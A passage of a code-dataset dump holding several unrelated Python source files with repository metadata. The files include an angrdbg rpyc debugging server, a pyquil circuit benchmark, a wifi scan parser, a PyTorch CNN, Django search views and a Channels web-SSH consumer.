] | permissive | jhscheer/angrdbg | 5ac4a278b02e4009442e1033a1cbd9bb5d024806 | 50f257fcfea1dde8e4e76625fe64e3ac4e5eca51 | refs/heads/master | 2020-03-29T05:38:19.115641 | 2018-09-17T10:15:26 | 2018-09-17T10:15:26 | 149,591,381 | 0 | 0 | BSD-2-Clause | 2018-09-20T10:20:11 | 2018-09-20T10:20:11 | null | UTF-8 | Python | false | false | 7,990 | py | #!/usr/bin/env python
"""
classic rpyc server running a SlaveService + angrdbg + IPython shell
usage:
angrdbg-srv.py # default settings
angrdbg-srv.py --host HOST --port PORT # custom settings
# ssl-authenticated server (keyfile and certfile are required)
angrdbg-srv.py --ssl-keyfile keyfile.pem --ssl-certfile certfile.pem --ssl-cafile cafile.pem
"""
import sys
import os
import rpyc
import threading
import signal
import Queue
from plumbum import cli
from rpyc.utils.server import Server
from rpyc.utils.classic import DEFAULT_SERVER_PORT, DEFAULT_SERVER_SSL_PORT
from rpyc.utils.registry import REGISTRY_PORT
from rpyc.utils.registry import UDPRegistryClient, TCPRegistryClient
from rpyc.utils.authenticators import SSLAuthenticator
from rpyc.lib import setup_logger
from rpyc.core import SlaveService
BANNER = "[angrdbg server v1.0]"
#######################
import angr
import claripy
import pyvex
import angrdbg
import IPython
#from angrdbg import *
#######################
class WeirdServer(Server): # n1 threaded n2 forked
def __init__(self, service, done_event, **kwargs):
self.num_conns = 2
self.thread = None
self.proc = None
self.done_event = done_event
Server.__init__(self, service, **kwargs)
@classmethod
def _handle_sigchld(cls, signum, unused):
try:
while True:
pid, dummy = os.waitpid(-1, os.WNOHANG)
if pid <= 0:
break
except OSError:
pass
# re-register signal handler (see man signal(2), under Portability)
signal.signal(signal.SIGCHLD, cls._handle_sigchld)
def _accept_method(self, sock):
self.num_conns -= 1
if self.num_conns == 1:
t = threading.Thread(
target=self._authenticate_and_serve_client,
args=[sock])
t.start()
self.thread = t
else:
pid = os.fork()
if pid == 0:
# child
try:
self.logger.debug("child process created")
# 76: call signal.siginterrupt(False) in forked child
signal.siginterrupt(signal.SIGCHLD, False)
self.listener.close()
self.clients.clear()
self._authenticate_and_serve_client(sock)
except BaseException:
self.logger.exception(
"child process terminated abnormally")
else:
self.logger.debug("child process terminated")
finally:
self.logger.debug("child terminated")
os._exit(0)
else:
# parent
self.proc = pid
sock.close()
if self.num_conns == 0:
self.done_event.set()
self.listener.close()
self.join()
def join(self):
self.thread.join()
try:
pid, dummy = os.waitpid(self.proc, 0) # os.WNOHANG)
except OSError as ee:
print ee
class AngrDbgServer(cli.Application):
port = cli.SwitchAttr(["-p", "--port"], cli.Range(0, 65535), default=None,
help="The TCP listener port (default = %s, default for SSL = %s)" %
(DEFAULT_SERVER_PORT, DEFAULT_SERVER_SSL_PORT), group="Socket Options")
host = cli.SwitchAttr(
["--host"],
str,
default="127.0.0.1",
help="The host to bind to. "
"The default is INADDR_ANY",
group="Socket Options")
ipv6 = cli.Flag(["--ipv6"], help="Enable IPv6", group="Socket Options")
logfile = cli.SwitchAttr(
"--logfile",
str,
default=None,
help="Specify the log file to use; "
"the default is stderr",
group="Logging")
quiet = cli.Flag(["-q",
"--quiet"],
help="Quiet mode (only errors will be logged)",
group="Logging")
ssl_keyfile = cli.SwitchAttr(
"--ssl-keyfile",
cli.ExistingFile,
help="The keyfile to use for SSL. Required for SSL",
group="SSL",
requires=["--ssl-certfile"])
ssl_certfile = cli.SwitchAttr(
"--ssl-certfile",
cli.ExistingFile,
help="The certificate file to use for SSL. Required for SSL",
group="SSL",
requires=["--ssl-keyfile"])
ssl_cafile = cli.SwitchAttr(
"--ssl-cafile",
cli.ExistingFile,
help="The certificate authority chain file to use for SSL. Optional; enables client-side "
"authentication",
group="SSL",
requires=["--ssl-keyfile"])
auto_register = cli.Flag(
"--register",
help="Asks the server to attempt registering with "
"a registry server. By default, the server will not attempt to register",
group="Registry")
registry_type = cli.SwitchAttr(
"--registry-type",
cli.Set(
"UDP",
"TCP"),
default="UDP",
help="Specify a UDP or TCP registry",
group="Registry")
registry_port = cli.SwitchAttr(
"--registry-port",
cli.Range(
0,
65535),
default=REGISTRY_PORT,
help="The registry's UDP/TCP port",
group="Registry")
registry_host = cli.SwitchAttr(
"--registry-host",
str,
default=None,
help="The registry host machine. For UDP, the default is 255.255.255.255; "
"for TCP, a value is required",
group="Registry")
def main(self):
if self.registry_type == "UDP":
if self.registry_host is None:
self.registry_host = "255.255.255.255"
self.registrar = UDPRegistryClient(
ip=self.registry_host, port=self.registry_port)
else:
if self.registry_host is None:
raise ValueError(
"With TCP registry, you must specify --registry-host")
self.registrar = TCPRegistryClient(
ip=self.registry_host, port=self.registry_port)
if self.ssl_keyfile:
self.authenticator = SSLAuthenticator(
self.ssl_keyfile, self.ssl_certfile, self.ssl_cafile)
default_port = DEFAULT_SERVER_SSL_PORT
else:
self.authenticator = None
default_port = DEFAULT_SERVER_PORT
if self.port is None:
self.port = default_port
setup_logger(self.quiet, self.logfile)
sys.stdout.write(
BANNER + " starting at %s %s\n" %
(self.host, self.port))
sys.stdout.flush()
done_event = threading.Event()
srv = WeirdServer(
SlaveService,
done_event,
hostname=self.host,
port=self.port,
reuse_addr=True,
ipv6=self.ipv6,
authenticator=self.authenticator,
registrar=self.registrar,
auto_register=self.auto_register)
t = threading.Thread(target=self._serve, args=[srv])
t.start()
# wait for 2 connections
done_event.wait()
IPython.embed(
banner1=BANNER + " client connected\n",
banner2="", # "tip: call serve_all() on the client to have a full working shell here.",
exit_msg=BANNER + " shell closed.\nexiting...\n"
)
os.kill(srv.proc, signal.SIGKILL)
os._exit(0)
def _serve(self, srv):
srv.start()
sys.stdout.write("\n" + BANNER + " client disconnected.\nexiting...\n")
os._exit(0)
def main():
AngrDbgServer.run()
'''simple client
import rpyc
import thread
conn1 = rpyc.classic.connect("localhost")
conn2 = rpyc.classic.connect("localhost")
thread.start_new_thread(conn2.serve_all, tuple())
'''
| [
"andreafioraldi@gmail.com"
] | andreafioraldi@gmail.com |
ec6fcf9d5ab20c814125e6ac6e0b78fc36051033 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p4VQE/R1/benchmark/startPyquil196.py | 6360a951c9bd056e2dd8006aa958ef69a2c7c95e | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,184 | py | # qubit number=4
# total number=12
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += H(0) # number=1
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += CNOT(2,0) # number=5
prog += H(0) # number=9
prog += CZ(2,0) # number=10
prog += H(0) # number=11
prog += X(3) # number=7
prog += X(3) # number=8
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil196.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
f7a36f223a0156d961c0da7655c5e5540947867f | 01efdeb528f753779da7a5c42d9ee47a063c9c9b | /tests/test_basic.py | f715b7a5eadb8af7edda0af1e5732c76618605bb | [
"MIT"
] | permissive | mustafakisacik/Deep-Learning-Training-GUI | 4b57ec3552e9adde07b5c3f98f2132bdbdcfc803 | 1992185fd18e768f30c5bb5edd08ea709be97b09 | refs/heads/master | 2020-12-23T22:47:16.476812 | 2020-01-29T01:22:46 | 2020-01-29T01:22:46 | 237,299,544 | 1 | 0 | MIT | 2020-01-30T20:29:44 | 2020-01-30T20:29:43 | null | UTF-8 | Python | false | false | 951 | py | import os
import numpy as np
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from multiprocessing import Process
def startTensorboard(logdir):
# Start tensorboard with system call
os.system("tensorboard --logdir {}".format(logdir))
def fitModel():
# Create your model
model = Sequential()
model.add(Dense(32, activation='relu', input_dim=100))
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['accuracy'])
# Some mock training data
data = np.random.random((1000, 100))
labels = np.random.randint(2, size=(1000, 1))
# Run the fit function
model.fit(data, labels, epochs=100, batch_size=32)
if __name__ == '__main__':
# Run both processes simultaneously
Process(target=startTensorboard, args=("logs",)).start()
Process(target=fitModel).start() | [
"tunalimustafamertt@gmail.com"
] | tunalimustafamertt@gmail.com |
76c5ed4159bd3cb355438ca8e76e93487fef1c31 | 0cc4d72bb2ad652eb0b5582af1559cacbd30f1c7 | /scripts/wifi_scan/wifi_scan.py | 0fb43ff607d4c951391151cd04913e6589ac8368 | [] | no_license | akrias/projects | ac4599983bfd0119a92b03f7021ffdfa80b238f8 | 5daa4720141d41f848e2edb83dc238078f1392f2 | refs/heads/master | 2020-03-30T18:14:43.660331 | 2018-10-16T06:00:54 | 2018-10-16T06:00:54 | 151,490,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,112 | py | #/usr/bin/python
import re
import subprocess
import datetime
import pprint
import json
import collections
import csv
class Cell(object):
"""A single cell (AP) entry from using the iwlist wlan0 scan command.
Attributes:
essid: string of the name of the network
address: string of the unique MAC Address of the cell
quality: int/float? representation of the signal strength of the cell
channel: int indicating which channel the network is set
frequency: float indicating which band the network is on
encryption: string describing the type of network encryption
"""
"""
def __init__(self, essid, address, quality, channel, frequency, encryption):
self.essid = essid
self.address = address
self.quality = quality
self.channel = channel
self.frequency = frequency
self.encryption = encryption
"""
# get essid from a line of data
# return string as essid from iwlist output
def get_essid(self, line):
essid=""
expr = re.compile(r"^ESSID\:\"(?P<essid>.*)\"$")
match = expr.search(line)
if match is not None:
essid = match.group(1)
return essid
#print "ESSID: " + essid
# get MAC address from a line of data
# return string as MAC address from iwlist output
def get_mac(self, line):
mac = ""
expr = re.compile(r"^Cell\s+(?P<cell>.*)\s+\-\s+Address\:\s+(?P<mac>.*)$")
match = expr.search(line)
if match is not None:
mac = match.group(2)
return mac
#print "MAC Address: " + mac
# get frequency band from a line of data
# return float as frequency band from iwlist output
def get_frequency(self, line):
frequency = ""
expr = re.compile(r"^Frequency\:(?P<frequency>[\d.]+)")
match = expr.search(line)
if match is not None:
frequency = match.group(1)
return frequency
#print "Frequency: " + frequency + "GHz"
# get channel number from a line of data
# return int as channel number from iwlist output
def get_channel(self, line):
channel = ""
expr = re.compile(r"^Channel\:(?P<channel>\d+)$")
match = expr.search(line)
if match is not None:
channel = match.group(1)
return channel
#print "Channel: " + channel
# get quality strength from a line of data
# return int / float as quality strength from iwlist output
def get_quality(self, line):
quality = ""
expr = re.compile(r"^Quality=(?P<signal_level>\d+)/(?P<signal_total>\d+)\s+Signal level=(?P<db>.*)$")
match = expr.search(line)
if match is not None:
quality1 = match.group(1)
quality2 = match.group(2)
db = match.group(3)
# convert signal values to % value
quality = format(100 * (float(quality1) / float(quality2)), '.2f')
return quality
#print "Signal Strength: " + quality1 + "/" + quality2
#print "db: " + db
# get encryption type from a line of data
# return string as an encryption type from iwlist output
def get_encryption(self, line):
encryption = ""
expr = re.compile(r"^Encryption key\:(?P<encryption>.*)$")
match = expr.search(line)
if match is not None:
encryption = match.group(1)
if encryption == "off":
encryption = "Open"
return encryption
else:
encryption = "Closed"
return encryption
# get iwlist output via subprocess with default interface as wlan0
# return string as iwlist output properties
def call_iwlist(self, interface="wlan0"):
p = subprocess.Popen(['iwlist', interface, 'scanning'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return p.stdout.read()
# get the current timestamp of the scanned AP
# return string as as formatted datetime module
def get_timestamp(self, line):
ts = '{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now())
expr = re.compile(r"^Cell\s+(?P<cell>.*)\s+\-.*")
match = expr.search(line)
if match is not None:
return ts
# pass in iwlist output content into argument
# iterates through each line and parses data by matching regex patterns
# returns list of data per cell entry
# At the same time, outputs all content in csv format to test file
def parse(self, iwlist_content):
# create csv file for output
f = open("test.csv", "w")
f.write("mac,timestamp,channel,frequency,quality,encryption,essid\n")
dic = {}
# tmp variable for mac addr matching
tmp_mac = ""
# separates each line by newline delimiter
lines = iwlist_content.split('\n')
for line in lines:
# strip all trailing empty spaces
line = line.strip()
if self.get_mac(line) is not None:
timestamp = self.get_timestamp(line)
mac = self.get_mac(line)
dic[mac]={'mac':mac,'timestamp':timestamp}
tmp_mac = mac
f.write(mac + "," + timestamp + ",")
elif self.get_channel(line) is not None:
channel = self.get_channel(line)
dic[tmp_mac].update({'channel':channel})
f.write(channel + ",")
elif self.get_frequency(line) is not None:
frequency = self.get_frequency(line)
dic[tmp_mac].update({'frequency':frequency})
f.write(frequency + ",")
elif self.get_essid(line) is not None:
essid = self.get_essid(line)
dic[tmp_mac].update({'essid':essid})
f.write(essid + "\n")
elif self.get_quality(line) is not None:
quality = self.get_quality(line)
dic[tmp_mac].update({'quality':quality})
f.write(quality + ",")
elif self.get_encryption(line) is not None:
encryption = self.get_encryption(line)
dic[tmp_mac].update({'encryption':encryption})
f.write(encryption + ",")
f.close()
return dic
# pretty prints the dictionary as a readable format to console
def output(self, dic):
pprint.pprint(dic)
# converts dictionary into json format
def to_json(self, dic):
with open('scan_data.json', 'wb') as fp:
json.dump(dic, fp)
# ********** main **********
asdf = Cell()
content = asdf.call_iwlist()
dic = asdf.parse(content)
asdf.to_json(dic)
asdf.output(dic)
| [
"locochocobo@gmail.com"
] | locochocobo@gmail.com |
f52cf9bd2c80065883c364bb502ee21046300949 | 81818932624d88c87deee1017605835b271e88ca | /model.py | eda1de54f6140821b9035ed90ac594d5c153b99d | [] | no_license | Seojin-Kim/Stock-prediction | 3d11d3f5edf9a6898d94552dd19af9ee60dde8b4 | 81634c4529d2946759a4358b527a80a1d9233c2b | refs/heads/main | 2023-03-09T12:32:01.148327 | 2021-02-18T08:13:31 | 2021-02-18T08:13:31 | 339,967,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,679 | py | import torch.nn as nn
import torch.nn.functional as F
import torch
cfg = {
'VGG11': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'VGG13': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'VGG16': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'VGG19': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
'SJ20_1': [32, 32, 'M', 32, 32, 'M'],
'SJ20_2': [64, 64, 'M', 128, 128, 'M', 128, 128, 'M'],
}
class CNN(nn.Module):
def __init__(self, model_code, in_channels, out_dim, act, use_bn):
super(CNN, self).__init__()
if act == 'relu':
self.act = nn.ReLU()
elif act == 'sigmoid':
self.act = nn.Sigmoid()
elif act == 'tanh':
self.act = nn.TanH()
else:
raise ValueError("Not a valid activation function code")
self.size = in_channels//5
several_layers = []
self.layers = self._make_layers(model_code, in_channels, use_bn)
for i in range(self.size):
several_layers.append(nn.Sequential(nn.Linear(512, out_dim)))
self.classifier = nn.ModuleList(several_layers)
#self.act,
#nn.Linear(256, out_dim))
#self.linear = nn.Sequential(nn.Linear(40, 256), self.act, nn.Linear(256, 512), self.act, nn.Linear(512, 2))
def forward(self, x):
x = self.layers(x)
x = x.view(x.size(0), -1)
ret = []
for i in range(self.size):
if i==0:
y = self.classifier[i](x)
ret = F.log_softmax(y, dim=1)
ret = ret.unsqueeze(2)
else:
y = self.classifier[i](x)
tmp_ret = F.log_softmax(y, dim=1)
ret = torch.cat((ret,tmp_ret.unsqueeze(2)),axis=2)
return ret
def _make_layers(self, model_code, in_channels, use_bn):
layers = []
for x in cfg[model_code]:
if x == 'M':
layers += [nn.MaxPool1d(kernel_size=2, stride=2)]
else:
layers += [nn.Conv1d(in_channels=in_channels,
out_channels=x,
kernel_size=3,
stride=1,
padding=1)]
if use_bn:
layers += [nn.BatchNorm1d(x)]
layers += [self.act]
in_channels = x
#print(x)
return nn.Sequential(*layers)
| [
"osikjs@kaist.ac.kr"
] | osikjs@kaist.ac.kr |
7b2597ce1e9e6e6daf8d7e56fa0a8b36ae2c662e | 69e9c901d7be385372e05eede55bd50fab72d4d4 | /HLLHC/v0prep/plotMySusySignal.py | 0824473501bb6182cccb3f02c23e205bc1e5261f | [] | no_license | conniemiao/stopSUSY | bad5cac63a433ad75cb66079f49ef1d6ce780e50 | 399915d1fc26055552501473ea1aa4a275c81d41 | refs/heads/master | 2020-05-29T18:35:20.073391 | 2020-01-06T04:47:10 | 2020-01-06T04:47:10 | 189,304,802 | 0 | 1 | null | 2019-12-01T22:47:30 | 2019-05-29T21:59:28 | Python | UTF-8 | Python | false | false | 2,196 | py | # plots a variable from a root file outputted by makeSusySignalRoot.py
from ROOT import TFile, TTree, TH1D, TCanvas, TLorentzVector
import numpy as np
# filename = "Stop_175_LSP1_small"
# inFile = TFile.Open("selectedMuEl_" + filename + ".root")
# plotVar = "nbtag" # **** change this line
filename = "/eos/user/a/alkaloge/HLLHC/Skims/v2/SingleStop/single-stop14TeV_R_220_A.root"
inFile = TFile.Open(filename)
plotVar = "muon_px" # **** change this line
plotSettings = { #[nBins,xMin,xMax]
"muon_pt":[100,0,3],
"muon_phi":[100,-4,4],
"muon_eta":[100,-3,3],
"muon_px":[100,-150,150],
"muon_py":[100,-150,150],
"muon_pz":[100,-450,350],
"muon_charge":[100,-1.5,1.5],
"muon_relIso":[100,0,0.35],
"electron_pt":[100,0,130],
"electron_phi":[100,-4,4],
"electron_eta":[100,-4,4],
"electron_px":[100,-120,120],
"electron_pz":[100,-300,200],
"electron_charge":[100,-1,1],
"electron_relIso":[100,0,0.35],
# "njets":[10,0,10],
# "nbtag":[3,0,3],
# "nbtagTight":[2,0,2],
"pfmet_corr_x":[100,-350,500],
"pfmet_corr_y":[100,-250,350],
"primvertex_count":[35,0,35],
"genweight":[100,2.980,2.995],
"mtmu":[100,0,350],
"mtel":[100,0,300]
}
nBins = plotSettings[plotVar][0]
xMin = plotSettings[plotVar][1]
xMax = plotSettings[plotVar][2]
print "Plotting", plotVar, "from", filename
# inTree = inFile.Get("t")
inTree = inFile.Get("AC1B")
nentries = inTree.GetEntries()
print("nentries={0:d}".format(nentries))
nMax = nentries
# nMax = 5000
count = 0
verbose = 0
hist = TH1D(plotVar, plotVar, nBins, xMin, xMax)
for entry in inTree :
if count > nMax : break
if verbose > 1 or (count % 5000 == 0) : print("count={0:d}".format(count))
count += 1
# hist.Fill(entry.muon_px) # **** change this line
val = list(entry.muon_px)
if len(val)>0: hist.Fill(val[0],1) # **** change this line
c1 = TCanvas("c1","Plot",200,50,1000,700)
hist.GetXaxis().SetTitle(plotVar + " (GeV)")
hist.GetYaxis().SetTitle("Number of Events")
hist.Draw()
c1.Update()
print "Press enter to finish."
raw_input()
| [
"conniem@princeton.edu"
] | conniem@princeton.edu |
ce6c75187338f6411561b65cbd6813d6ec815c50 | ad512372f62e4600ac3983e1e679fac67aa0e986 | /classes/classes/main.py | 30ad7d0f7b416fb9f7eba8cb0ed1ffd0869d9e79 | [] | no_license | jasonis/DPfWP | d83d1357da242247cdef851af4a475293bbee7b7 | 73eed9332daa405f4d2f9434140c6ebce485e81d | refs/heads/master | 2020-05-13T17:36:31.086585 | 2014-08-29T00:11:19 | 2014-08-29T00:11:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,348 | py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import webapp2
class MainHandler(webapp2.RequestHandler):
def get(self):
about_button = Button()
about_button.label = "about us"
about_button.show_label()
contact_button = Button()
contact_button.label = "contact us"
class Button(object):
def __init__(self):
self.label = '' # public attribute
self.__size = 60
self.color = '0x000000'
self.click()
#self.on_roll_over("hello!!")
def click(self):
print "I've been clicked"
def on_roll_over(self, message):
print "You've rolled over my button"
def show_label(self):
print "my label is" + self.label
app = webapp2.WSGIApplication([
('/', MainHandler)
], debug=True)
| [
"jislocum78@gmail.com"
] | jislocum78@gmail.com |
a2a54db18153e09c2bdd4306052b808031bbdae2 | eba5e5ff22bcba73001fba729218c02cd257759f | /assets/utils/webssh.py | 2cb35bc81b8a867099b45e74389da231bd5cb930 | [] | no_license | duoyichen/Ops-1 | d04ea66aa37c0732ddeff08889819d8ca830985e | 56d3838a40dc0644a0fe8e58f40be421eaddc693 | refs/heads/master | 2020-04-29T11:48:34.329401 | 2019-03-14T10:29:38 | 2019-03-14T10:29:38 | 166,679,958 | 0 | 1 | null | 2019-01-20T15:59:18 | 2019-01-20T15:59:18 | null | UTF-8 | Python | false | false | 5,155 | py | # -*- coding: utf-8 -*-
import paramiko
import threading
import time
import os
import logging
from socket import timeout
from assets.tasks import admin_file
from channels.generic.websocket import WebsocketConsumer
from assets.models import ServerAssets, AdminRecord
from django.conf import settings
from utils.crypt_pwd import CryptPwd
class MyThread(threading.Thread):
def __init__(self, chan):
super(MyThread, self).__init__()
self.chan = chan
self._stop_event = threading.Event()
self.start_time = time.time()
self.current_time = time.strftime(settings.TIME_FORMAT)
self.stdout = []
self.read_lock = threading.RLock()
def stop(self):
self._stop_event.set()
def run(self):
with self.read_lock:
while not self._stop_event.is_set():
time.sleep(0.1)
try:
data = self.chan.chan.recv(1024)
if data:
str_data = bytes.decode(data)
self.chan.send(str_data)
self.stdout.append([time.time() - self.start_time, 'o', str_data])
except timeout:
break
self.chan.send('\n由于长时间没有操作,连接已断开!')
self.stdout.append([time.time() - self.start_time, 'o', '\n由于长时间没有操作,连接已断开!'])
self.chan.close()
def record(self):
record_path = os.path.join(settings.MEDIA_ROOT, 'admin_ssh_records', self.chan.scope['user'].username,
time.strftime('%Y-%m-%d'))
if not os.path.exists(record_path):
os.makedirs(record_path, exist_ok=True)
record_file_name = '{}.{}.cast'.format(self.chan.host_ip, time.strftime('%Y%m%d%H%M%S'))
record_file_path = os.path.join(record_path, record_file_name)
header = {
"version": 2,
"width": self.chan.width,
"height": self.chan.height,
"timestamp": round(self.start_time),
"title": "Demo",
"env": {
"TERM": os.environ.get('TERM'),
"SHELL": os.environ.get('SHELL', '/bin/bash')
},
}
admin_file.delay(record_file_path, self.stdout, header)
login_status_time = time.time() - self.start_time
if login_status_time >= 60:
login_status_time = '{} m'.format(round(login_status_time / 60, 2))
elif login_status_time >= 3600:
login_status_time = '{} h'.format(round(login_status_time / 3660, 2))
else:
login_status_time = '{} s'.format(round(login_status_time))
try:
AdminRecord.objects.create(
admin_login_user=self.chan.scope['user'],
admin_server=self.chan.host_ip,
admin_remote_ip=self.chan.remote_ip,
admin_start_time=self.current_time,
admin_login_status_time=login_status_time,
admin_record_file=record_file_path.split('media/')[1]
)
except Exception as e:
logging.getLogger().error('数据库添加用户操作记录失败,原因:{}'.format(e))
class SSHConsumer(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super(SSHConsumer, self).__init__(*args, **kwargs)
self.ssh = paramiko.SSHClient()
self.group_name = self.scope['url_route']['kwargs']['group_name']
self.server = ServerAssets.objects.select_related('assets').get(id=self.scope['path'].split('/')[3])
self.host_ip = self.server.assets.asset_management_ip
self.width = 150
self.height = 30
self.t1 = MyThread(self)
self.remote_ip = self.scope['query_string'].decode('utf8')
self.chan = None
def connect(self):
self.accept()
username = self.server.username
try:
self.ssh.load_system_host_keys()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh.connect(self.host_ip, int(self.server.port), username,
CryptPwd().decrypt_pwd(self.server.password), timeout=5)
except Exception as e:
logging.getLogger().error('用户{}通过webssh连接{}失败!原因:{}'.format(username, self.host_ip, e))
self.send('用户{}通过webssh连接{}失败!原因:{}'.format(username, self.host_ip, e))
self.close()
self.chan = self.ssh.invoke_shell(term='xterm', width=self.width, height=self.height)
# 设置如果3分钟没有任何输入,就断开连接
self.chan.settimeout(60 * 3)
self.t1.setDaemon(True)
self.t1.start()
def receive(self, text_data=None, bytes_data=None):
self.chan.send(text_data)
def disconnect(self, close_code):
try:
self.t1.record()
finally:
self.ssh.close()
self.t1.stop()
| [
"zm_world@163.com"
] | zm_world@163.com |
ddb68500430e1a0792d20c343f07dfe6036636d3 | 8c14e2b39554caea82e57d53d082d3325efe1e68 | /HelloWorld/search.py | 7d0a7d7b0c090c852141dd33157ea2e18e9beb1e | [] | no_license | BoyOoka/HelloWorld | 098a83f2c01f1aa15d3dc57781b2c3bf37e37cc1 | fd7ae739105921428dade787dd6d3ddf4bd18841 | refs/heads/master | 2020-06-03T12:09:04.360649 | 2019-06-12T11:55:28 | 2019-06-12T11:55:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 757 | py | # -*- coding: utf-8 -*-
from django.http import HttpResponse
from django.shortcuts import render_to_response, render
# from django
# 表单
def search_form(request):
return render(request, 'search_form.html')
# 接收请求数据
def search_get(request):
print(request)
print(request.GET)
request.encoding = 'utf-8'
if request.GET['q']:
message = '你搜索的内容为:' + request.GET['q']
else:
message = '你提交了空表单'
return HttpResponse(message)
def search_post(request):
print(request)
print(request.POST)
if request.POST['q']:
message = '你提交的内容为:' + request.POST['q']
else:
message = '你提交了空内容'
return HttpResponse(message)
| [
"pengyihao@baie.com.cn"
] | pengyihao@baie.com.cn |
e20f8797206e7caf8dcf0cf85d87da67831b181e | 22ad0c489d4ee8b1905e913cc4668a97756ad005 | /q5.py | 520f0379a35e3668e8de5023d2344f75c5738a3b | [] | no_license | semihPy/Class4-Exam | e2e507b8c3e57aa71785fe197c65b5bfb22e1c59 | 87f1713c58bcdf7e9e8e2a95c9d6dc52720abded | refs/heads/main | 2023-03-25T01:02:09.426299 | 2021-03-27T21:53:46 | 2021-03-27T21:53:46 | 352,060,145 | 0 | 0 | null | 2021-03-27T11:52:21 | 2021-03-27T11:52:21 | null | UTF-8 | Python | false | false | 496 | py |
# Input ile girilen bir cumledeki sayilarin ve harflerin miktarini hesaplayan bir fonksiyon yaziniz.
# Ornek input: hello world! 123
# Output:
# HARFLER: 10
# SAYILAR: 3
def myfunc():
s=input("string ve sayi giriniz:").split(" ")
harfler=0
sayilar=0
for i in s:
if i.isdigit():
sayilar += len(i)
else:
harfler += len(i)
print('HARFLER:',harfler)
print('SAYILAR:',sayilar)
myfunc() | [
"noreply@github.com"
] | noreply@github.com |
303b6774137255febbbd1b27906dd550026a4999 | 88287768bd23da62adea05ba61341e44d6e6db41 | /commandable/command_loader.py | 8e57671357a3114ced6ad66f000ad514cab3904f | [
"Apache-2.0"
] | permissive | newcraftgroup/nci-python-commands | ac7d5746633c10d2525aa26339dd35230a07f37e | 8ccdc9251c16305dea54159028ec245dc91a4339 | refs/heads/master | 2021-01-19T05:19:04.823362 | 2019-01-28T10:05:50 | 2019-01-28T10:05:50 | 100,577,546 | 1 | 1 | Apache-2.0 | 2019-01-28T10:05:55 | 2017-08-17T07:59:08 | Python | UTF-8 | Python | false | false | 3,677 | py | # Copyright 2017 NEWCRAFT GROUP B.V.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import sys
import os
import importlib
from modulefinder import Module
from commandable.command import Command
from commandable.commands.help import Help
class CommandLoader:
"""
A basic command loader
Parameters
----------
namespaces: list
A list of namespaces to accept commands from
arguments: dict, optional
The arguments to pass on to the command
"""
def __init__(self, namespaces=None, arguments=None):
if namespaces is None:
namespaces = []
if isinstance(namespaces, str):
namespaces = [namespaces]
namespaces += ["commandable.commands"]
self.arguments = arguments or sys.argv[:]
self.prog_name = os.path.basename(self.arguments[0])
self.command = self.arguments[1] if len(self.arguments) > 1 else "help"
self.namespaces = namespaces
self.arguments = self.arguments[2:]
self.execute(self.command)
def execute(self, name):
"""
Parameters
----------
name : str
The command to execute
"""
namespaces = self.namespaces[:]
instance = None
while len(namespaces) > 0:
instance = self.load_command(name, namespaces.pop())
if instance is not None:
break
if instance is None:
self.load_command("help", "commandable.commands", called=name)
@staticmethod
def to_camelcase(name):
"""
Parameters
----------
name : str
The string to convert to camelcase formatting
Returns
-------
str
Converted name string from underscore to camel case
"""
return ''.join(word.capitalize() or '_' for word in name.split("_"))
@staticmethod
def to_underscore(name):
"""
Parameters
----------
name : str
The string to convert to underscore formatting
Returns
-------
Converted name string from camel case to underscore
"""
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
